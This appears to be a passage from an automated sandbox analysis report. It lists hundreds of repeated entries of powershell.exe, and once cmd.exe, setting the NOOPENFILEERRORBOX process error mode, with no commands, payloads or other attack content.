          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
